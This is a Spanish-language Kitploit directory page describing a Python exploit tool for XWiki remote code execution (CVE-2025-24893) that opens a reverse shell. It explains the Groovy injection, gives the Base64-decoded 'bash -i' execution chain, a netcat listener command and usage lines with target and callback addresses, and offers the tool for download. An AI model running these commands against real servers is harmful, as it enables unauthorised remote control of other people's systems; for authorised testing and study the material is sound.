Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xwiki-15.10.8-reverse-shell-cve-2025-24893 — CVE-2025-24893 exploit RCE para XWiki con capacidad de shell inversa | Kitploit
Herramientas/GitHubGitHub/bishben/xwiki-15.10.8-reverse-shell-cve-2025-24893
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónHerramienta de Acceso Remoto
GitHubbishben/xwiki-15.10.8-reverse-shell-cve-2025-24893

xwiki-15.10.8-reverse-shell-cve-2025-24893

CVE-2025-24893 exploit RCE para XWiki con capacidad de shell inversa

Ver Repositorio
36hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de Reverse Shell CVE-2025-24893 para XWiki

Descargo de responsabilidad: Este script está destinado solo con fines educativos y pruebas de seguridad autorizadas. No lo utilice en sistemas que no posea o para los que no tenga permiso explícito para realizar pruebas. El mal uso puede ser ilegal y peligroso.

Descripción

Este script de Python explota CVE-2025-24893, una vulnerabilidad de ejecución remota de código que afecta a versiones de XWiki hasta 15.10.10.

  • Versión probada: XWiki 15.10.8
  • Impacto: Permite la ejecución de comandos arbitrarios en el servidor objetivo.
  • Versión de Python: Escrito y probado en Python 3

Esta versión extiende el PoC original de Al Baradi Joy para generar un reverse shell. El PoC original se puede encontrar aquí.

Cómo Funciona

  • XWiki ejecuta código Groovy a través del parámetro de URL.

  • El exploit inyecta un comando bash -c en esta plantilla Groovy.

  • Un reverse shell normal contiene múltiples comillas (' y ) que y la URL.

"
romperían la evaluación de Groovy
  • Para solucionarlo, el script codifica el comando de shell de una línea en Base64.

  • Luego, el payload se envía en la URL y se ejecuta usando la siguiente cadena:

    {echo,<base64>} | {base64,-d} | {bash,-i}

  • Esto decodifica el payload Base64 de forma segura y lo ejecuta con bash -i, otorgando un reverse shell interactivo.

  • Formato de URL Objetivo

    • Formato: http://<host-objetivo>
    • NO incluya:
      • Una barra diagonal / al final
      • La ruta /xwiki (el script la añade automáticamente)

    Ejemplos:

    root@kitploit:~
    # Correcto
    http://10.129.95.114:8080
    http://ejemplo.com:8080
    
    # Incorrecto
    http://10.129.95.114:8080/         # barra diagonal al final
    http://ejemplo.com/xwiki            # incluye /xwiki
    

    Configuración del Listener

    Antes de ejecutar el exploit, debe iniciar un listener en su máquina para capturar el reverse shell.

    Ejemplo usando Netcat:

    root@kitploit:~
    nc -lvnp <lport>
    
    • <lport> debe coincidir con el puerto que proporcione como argumento al script.

    Uso

    root@kitploit:~
    python3 cve-2025-24893.py <url_base_objetivo> <lhost> <lport>
    

    Ejemplo:

    root@kitploit:~
    python3 cve-2025-24893.py http://10.129.95.114:8080 10.0.0.5 4444
    
    • El script imprime la URL completa del exploit, el payload Base64 y las instrucciones para verificar su listener.

    Referencias

    • Aviso GHSA
    • Página principal de XWiki
    • PoC original de Al Baradi Joy

    Créditos

    • Prueba de concepto original: Al Baradi Joy
    • Esta versión: Mejorada para generar un reverse shell para ejecución interactiva de comandos

    Advertencia

    • Utilice este exploit solo en entornos controlados (HTB, máquinas de laboratorio, VMs que posea).
    • El uso no autorizado en servidores públicos es ilegal y puede resultar en cargos penales.
    Descargar herramienta